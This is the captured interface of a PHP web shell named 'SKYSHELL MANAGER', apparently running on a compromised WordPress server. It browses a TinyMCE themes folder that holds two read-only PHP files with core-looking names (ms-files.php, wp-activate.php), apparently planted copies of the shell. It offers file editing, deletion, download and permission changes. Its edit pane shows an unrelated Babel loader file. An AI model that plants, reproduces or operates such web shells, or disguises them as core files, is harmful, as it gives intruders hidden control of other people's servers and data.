📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: babel-core.cjs
function initialize(babel) { exports.init = null; exports.version = babel.version; exports.traverse = babel.traverse; exports.types = babel.types; exports.tokTypes = babel.tokTypes; exports.parseSync = babel.parseSync; exports.loadPartialConfigSync = babel.loadPartialConfigSync; exports.loadPartialConfigAsync = babel.loadPartialConfigAsync; exports.createConfigItem = babel.createConfigItem; } { initialize(require("@babel/core")); } //# sourceMappingURL=babel-core.cjs.map
Save